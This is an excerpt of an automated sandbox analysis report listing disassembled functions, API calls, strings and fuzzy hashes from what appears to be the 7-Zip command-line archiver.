                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free$memmove
                              • String ID:
                              • API String ID: 1534225298-0
                              • Opcode ID: 51443f359d02d4d6a3316e986999cefc06be1755e231d8eee587d5ab8d0cdd41
                              • Instruction ID: 25dcdbf84b43bcdfbf68f4d7a7b98853ae4f3d9cd3c976e3c124d6fc7415ac1e
                              • Opcode Fuzzy Hash: 51443f359d02d4d6a3316e986999cefc06be1755e231d8eee587d5ab8d0cdd41
                              • Instruction Fuzzy Hash: E9014033311A4A92CB84EB26DD5146C7320FB85F94B448122AF1E5F661DF29DC76D361
                              Function 00FB567C Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 132COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free
                              • String ID: /$\$a$z
                              • API String ID: 1294909896-3795456795
                              • Opcode ID: cbb6cdde9bbede098d1a09249e70140af35240451739d7ec759a066a9ed656c4
                              • Instruction ID: 640dd520b57cf5ad47e39d29106455dbf7abad2e82b0d231cdebf659e0b251c4
                              • Opcode Fuzzy Hash: cbb6cdde9bbede098d1a09249e70140af35240451739d7ec759a066a9ed656c4
                              • Instruction Fuzzy Hash: 9141B157F00A9DD9DB30AB2394047F967A1F311FB4FA94122DA9943290EF6C89C6FB01
                              Function 00FA1150 Relevance: 12.1, APIs: 5, Strings: 3, Instructions: 119COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free$memmove
                              • String ID: crc$flags$memuse
                              • API String ID: 1534225298-339511674
                              • Opcode ID: e21856f84c870d7db48635653d6967b62ce9fcb6883053445639cf198c186752
                              • Instruction ID: fe3562adcca71bd59f85230533c2f7a005a7fbfb4228d56783a5e922bfc212fa
                              • Opcode Fuzzy Hash: e21856f84c870d7db48635653d6967b62ce9fcb6883053445639cf198c186752
                              • Instruction Fuzzy Hash: 7E41C163244545D1DF70EB25E8403AD7761F7813A4F998223A78E87A68DE2CCA8AF701
                              Function 00FA0FF4 Relevance: 12.1, APIs: 2, Strings: 6, Instructions: 69COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free
                              • String ID: Pzm$crc32$crc64$md5$sha1$sha256
                              • API String ID: 1294909896-3602218319
                              • Opcode ID: 5c0bd5280fbc6aacd66de0107fb76e14af5b6653b3fe4b2f7fc9e043c9ad99a7
                              • Instruction ID: 21d4cba596181f769d17d2ddab86fed110cc51af14d66fa62013761123a49d98
                              • Opcode Fuzzy Hash: 5c0bd5280fbc6aacd66de0107fb76e14af5b6653b3fe4b2f7fc9e043c9ad99a7
                              • Instruction Fuzzy Hash: 6E21D66270068498DA30AB01E9407AD7321F3967F0F95C222DA5E5BB98DE3CC6C5F701
                              Function 00FBE7D8 Relevance: 11.6, APIs: 9, Instructions: 393COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free
                              • String ID:
                              • API String ID: 1294909896-0
                              • Opcode ID: 7e9e0c893d8009210741f711a643144d21a87e9832b452d64a1c650c1e460181
                              • Instruction ID: 9681350870db63780bfcd4ceb20f7729c7f161bdc4959e0e79a149ee3beee58d
                              • Opcode Fuzzy Hash: 7e9e0c893d8009210741f711a643144d21a87e9832b452d64a1c650c1e460181
                              • Instruction Fuzzy Hash: 5DF17A72704A4496CB60DF26D8902EE7BA5F789F94F049122DF8E57724DF38C895EB01
                              Function 00F75C18 Relevance: 11.4, APIs: 9, Instructions: 112COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free$memmove
                              • String ID:
                              • API String ID: 1534225298-0
                              • Opcode ID: 191017a4a65d9787c0d091cd8e389a0f8edc0b3f56ec8753be0991dbb6cee37b
                              • Instruction ID: 30703e54d7f58f33421cd474e09b74f5f7d6ce834607b8ad0ff210b761b788e2
                              • Opcode Fuzzy Hash: 191017a4a65d9787c0d091cd8e389a0f8edc0b3f56ec8753be0991dbb6cee37b
                              • Instruction Fuzzy Hash: C441C422718FC486DA60EF26E84015D7710EB86FE4F48C226FE9E1BB59CF6DC8129701
                              Function 00FBCF80 Relevance: 11.3, APIs: 9, Instructions: 94COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: memcmp
                              • String ID:
                              • API String ID: 1475443563-0
                              • Opcode ID: cb30fffc6ea31fde2c5ee4f40d9d3f4f980a3b1abe6e9151bdc7ecd07fbb7933
                              • Instruction ID: de265f4c220037bf3a4debc9c6b7647626670117b1bb562b9612869b9c62fc4f
                              • Opcode Fuzzy Hash: cb30fffc6ea31fde2c5ee4f40d9d3f4f980a3b1abe6e9151bdc7ecd07fbb7933
                              • Instruction Fuzzy Hash: 0831BCA230971281EB24AB27DD417F933269B15FD4FC85026DE094B60DFF68CA46F74A
                              Function 00FB1410 Relevance: 11.3, APIs: 9, Instructions: 54COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free
                              • String ID:
                              • API String ID: 1294909896-0
                              • Opcode ID: 9a8387ae601500122f572f294227a66f10f0ad07e155eb24b92f1dd97e1a69c6
                              • Instruction ID: ebf03c20981d45ab4ef6d3f2d7f517274f37c76379e9e5b2d265dcec4797e4fb
                              • Opcode Fuzzy Hash: 9a8387ae601500122f572f294227a66f10f0ad07e155eb24b92f1dd97e1a69c6
                              • Instruction Fuzzy Hash: A0015E2324664981C7D5FB32E86166E7710EBC2B91F849022EE4E57721CE3DC4A7A715
                              Function 00FB1378 Relevance: 11.3, APIs: 9, Instructions: 50COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free
                              • String ID:
                              • API String ID: 1294909896-0
                              • Opcode ID: 0816cad8a9ea06915a236e8603301d5263cf40a5a715ebb3b4369cad3db0b704
                              • Instruction ID: 0fe31133cd4f0094fbaab2e9647127041697e6f902ba7736ee33e9653f41389f
                              • Opcode Fuzzy Hash: 0816cad8a9ea06915a236e8603301d5263cf40a5a715ebb3b4369cad3db0b704
                              • Instruction Fuzzy Hash: C801122324564981C7D1F736E86166E6310FBC6B91F849023EE0E57711CE3DC4A7A715
                              Function 00FB1708 Relevance: 11.3, APIs: 9, Instructions: 50COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free
                              • String ID:
                              • API String ID: 1294909896-0
                              • Opcode ID: e186d5f6c2a6a8e5e5618b41f51224d408bf29008b427c36f0df3b9dac91f40b
                              • Instruction ID: a950b332b2ec630b9e0c29f66cf03e0dc50ba507ddd278894db2e8d55e1f59a0
                              • Opcode Fuzzy Hash: e186d5f6c2a6a8e5e5618b41f51224d408bf29008b427c36f0df3b9dac91f40b
                              • Instruction Fuzzy Hash: F301FB2324564A82CBD1F736E85166E6310FBC2B91F80A022EE0E57621DE3DC4A7A716
                              Function 00FB158F Relevance: 11.3, APIs: 9, Instructions: 49COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free
                              • String ID:
                              • API String ID: 1294909896-0
                              • Opcode ID: d16567f6c00b92bf3affa58cb78e9578cc7c9085ca4f2d812a04ae04698967dd
                              • Instruction ID: 0b4296cd88c2605955a0e2e5fb0c8f5e88de5e60d5107068d865411b6fd830a6
                              • Opcode Fuzzy Hash: d16567f6c00b92bf3affa58cb78e9578cc7c9085ca4f2d812a04ae04698967dd
                              • Instruction Fuzzy Hash: 0A01FB2324564A82CBD1F736E85166E6310FBC2B91F809023EE0E57621CE3DC5A7A616
                              Function 00FB14BB Relevance: 11.3, APIs: 9, Instructions: 48COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free
                              • String ID:
                              • API String ID: 1294909896-0
                              • Opcode ID: ce6774dc4cefc2f10703df0088628459081cb7c9729eaeb008019dfa35909437
                              • Instruction ID: 966403f4903fe3a3f30dcc0a464477ef18f783c30c88d769313f591a5efb7474
                              • Opcode Fuzzy Hash: ce6774dc4cefc2f10703df0088628459081cb7c9729eaeb008019dfa35909437
                              • Instruction Fuzzy Hash: 08F01D2324564982CBD1F736E85166E6310EBC2B91F809023EE0E57621CE3DC5A7A715
                              Function 00FC6BAC Relevance: 11.3, APIs: 9, Instructions: 45COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free
                              • String ID:
                              • API String ID: 1294909896-0
                              • Opcode ID: 567f433233aab85a3815d1036ae4ca761e1692422187d0b75a72c43c8f0da7d1
                              • Instruction ID: 21afc223e4dca786a43e8f2ab83493c1a9223445aa8b65fcbdd271a34c23c57e
                              • Opcode Fuzzy Hash: 567f433233aab85a3815d1036ae4ca761e1692422187d0b75a72c43c8f0da7d1
                              • Instruction Fuzzy Hash: AF017123710A8989CB90FE36DC9156C3320EB85BA8B488533BF0D5F715DE29CC629351
                              Function 00F830DC Relevance: 11.3, APIs: 9, Instructions: 44COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free
                              • String ID:
                              • API String ID: 1294909896-0
                              • Opcode ID: c46e5541d977855d1a0c37effd58fe58424e248d92aec372ebddbd1a340c7478
                              • Instruction ID: 682d2e4af4c383e5383e78a9f0112178ad6c71f2a1707b2b2727b5ae82d2356a
                              • Opcode Fuzzy Hash: c46e5541d977855d1a0c37effd58fe58424e248d92aec372ebddbd1a340c7478
                              • Instruction Fuzzy Hash: 7D012563B11A8589CB90FF36DC9119C3320EB85FA9F588132BE0D5F765DE29CC629351
                              Function 00F7A3F8 Relevance: 10.7, APIs: 6, Strings: 1, Instructions: 229COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free$memmove
                              • String ID: ??\
                              • API String ID: 1534225298-3933555804
                              • Opcode ID: 89cfc767efb9ab766bc2f8585a8b153b0681b1a8072a88ea8b9d26a6b54f2955
                              • Instruction ID: b499e0e29eaa453b406331ebbc05f68460860b0142b7b935f2b20f52b9ba7c42
                              • Opcode Fuzzy Hash: 89cfc767efb9ab766bc2f8585a8b153b0681b1a8072a88ea8b9d26a6b54f2955
                              • Instruction Fuzzy Hash: FD718B73A15A8086CB20DF21D8101AD7320FB95B94B8AD027EB9E47724EB7DC956F703
                              Function 00F84624 Relevance: 10.7, APIs: 4, Strings: 3, Instructions: 199COMMON
                              Download Yara Rule
                              APIs
                              • free.MSVCRT ref: 00F84872
                                • Part of subcall function 00F841F4: free.MSVCRT ref: 00F842A5
                                • Part of subcall function 00F841F4: _CxxThrowException.MSVCRT ref: 00F842C8
                                • Part of subcall function 00F841F4: _CxxThrowException.MSVCRT ref: 00F842EE
                                • Part of subcall function 00F841F4: _CxxThrowException.MSVCRT ref: 00F84322
                              • free.MSVCRT ref: 00F848BB
                              • _CxxThrowException.MSVCRT ref: 00F848FD
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: ExceptionThrow$free
                              • String ID: Incorrect wildcard type marker$Too short switch$inorrect switch
                              • API String ID: 3129652135-3392774464
                              • Opcode ID: 75254e321aba016fd7ca34ce8b583dfbb945adc394beb129086a94450d6d3e0a
                              • Instruction ID: c365a9aac7720a1a7c23a429fc8f661546212db3b80b9075aa42353c493439dc
                              • Opcode Fuzzy Hash: 75254e321aba016fd7ca34ce8b583dfbb945adc394beb129086a94450d6d3e0a
                              • Instruction Fuzzy Hash: 6F711B236086C295DB60EF25E8803EEBB61F3D1794F548123EB8A07B58DB7DD895E700
                              Function 00FCCB4C Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 195COMMON
                              Download Yara Rule
                              APIs
                              • fputs.MSVCRT ref: 00FCCC30
                              • fputs.MSVCRT ref: 00FCCD17
                                • Part of subcall function 00FCB4D0: memset.MSVCRT ref: 00FCB515
                                • Part of subcall function 00FCB4D0: fputs.MSVCRT ref: 00FCB53A
                                • Part of subcall function 00F72790: fputs.MSVCRT ref: 00F727D9
                                • Part of subcall function 00F72790: free.MSVCRT ref: 00F727E5
                                • Part of subcall function 00F72790: free.MSVCRT ref: 00F727F0
                                • Part of subcall function 00F724C4: fputc.MSVCRT ref: 00F724D5
                              • fputs.MSVCRT ref: 00FCCE03
                                • Part of subcall function 00F724A8: fflush.MSVCRT ref: 00F724AF
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: fputs$free$fflushfputcmemset
                              • String ID: ERROR: $ERRORS:$WARNINGS:
                              • API String ID: 2975459029-4064182643
                              • Opcode ID: 15f5701c0a91d4a9998e26da8d0ac5bba960db307386a34ac971619cd8b529d9
                              • Instruction ID: 0698ce79632772edcc2ff5e0ef18ea30e2f309e13f2b9cad4257194c18897583
                              • Opcode Fuzzy Hash: 15f5701c0a91d4a9998e26da8d0ac5bba960db307386a34ac971619cd8b529d9
                              • Instruction Fuzzy Hash: 1071C766B006C695CE7CEF76DA52B6E7312F741B90F08842BDF1E47602CF28D891A391
                              Function 00FC1F74 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 159stringCOMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: fputsmemsetstrlen$free
                              • String ID:
                              • API String ID: 2852212109-2735817509
                              • Opcode ID: 9a7147a006a768db9ea54475be91510b63d358eb6ce8c9524d123a3ef5e3e896
                              • Instruction ID: 21044cbf94f552ae0aec4c98e5c5e0911f594ad484d08fa069de2e092920b953
                              • Opcode Fuzzy Hash: 9a7147a006a768db9ea54475be91510b63d358eb6ce8c9524d123a3ef5e3e896
                              • Instruction Fuzzy Hash: B151022220868186C760DB26E9517AEB7B1F385BD4F58912AEF8A07B18CF3CC595DB00
                              Function 00FC062C Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 157COMMON
                              Download Yara Rule
                              APIs
                              • EnterCriticalSection.KERNEL32 ref: 00FC064E
                                • Part of subcall function 00F73730: free.MSVCRT ref: 00F7376A
                                • Part of subcall function 00F73730: memmove.MSVCRT(00000000,?,?,00000000,00F710B0), ref: 00F73785
                              • fputs.MSVCRT ref: 00FC0716
                              • fputs.MSVCRT ref: 00FC07F8
                              • fputs.MSVCRT ref: 00FC0814
                              • LeaveCriticalSection.KERNEL32 ref: 00FC08B6
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: fputs$CriticalSection$EnterLeavefreememmove
                              • String ID: ???
                              • API String ID: 2578255354-1053719742
                              • Opcode ID: 8bc78d78a14cb8c6c1f32dd9e7f73f0023bb57c4da4c75337c1a0a2f7e0af3ab
                              • Instruction ID: 824486ba636702580756a7fa0b36b02b9cb4c9fbd96d4097822241daf3ac1af6
                              • Opcode Fuzzy Hash: 8bc78d78a14cb8c6c1f32dd9e7f73f0023bb57c4da4c75337c1a0a2f7e0af3ab
                              • Instruction Fuzzy Hash: 17615A36700A82E2DB1DDF21DA55BE97321FB84B95F44802ADB1D47764CF38E4AAE340
                              Function 00F79CD0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 139COMMON
                              Download Yara Rule
                              APIs
                              • DeviceIoControl.KERNEL32 ref: 00F79D32
                              • DeviceIoControl.KERNEL32 ref: 00F79E16
                              • DeviceIoControl.KERNEL32 ref: 00F79E6D
                              • DeviceIoControl.KERNEL32 ref: 00F79EAE
                                • Part of subcall function 00F7BC48: GetModuleHandleW.KERNEL32 ref: 00F7BC69
                                • Part of subcall function 00F7BC48: GetProcAddress.KERNEL32 ref: 00F7BC79
                                • Part of subcall function 00F7BC48: GetDiskFreeSpaceW.KERNEL32 ref: 00F7BCCA
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: ControlDevice$AddressDiskFreeHandleModuleProcSpace
                              • String ID: ($:
                              • API String ID: 4250411929-4277925470
                              • Opcode ID: ce002fe7effc5463a8c12060252067aaf69f96b6df7ad79dc4c52b9bfb511346
                              • Instruction ID: 8de6311ce5b7f11ad85f11e61fbe92bab6c5d8054ee295264d7f95381c905aa5
                              • Opcode Fuzzy Hash: ce002fe7effc5463a8c12060252067aaf69f96b6df7ad79dc4c52b9bfb511346
                              • Instruction Fuzzy Hash: FD518722A0DBC085CB31CF24E05079EB764F784768F54D12AEB8E47B58EBB9C495DB41
                              Function 00FC0474 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 106COMMON
                              Download Yara Rule
                              APIs
                              • EnterCriticalSection.KERNEL32 ref: 00FC0492
                              • fputs.MSVCRT ref: 00FC04F4
                              • fputs.MSVCRT ref: 00FC0520
                                • Part of subcall function 00FCB4D0: memset.MSVCRT ref: 00FCB515
                                • Part of subcall function 00FCB4D0: fputs.MSVCRT ref: 00FCB53A
                              • LeaveCriticalSection.KERNEL32 ref: 00FC0616
                              Strings
                              • Would you like to replace the existing file:, xrefs: 00FC04ED
                              • with the file from archive:, xrefs: 00FC0516
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
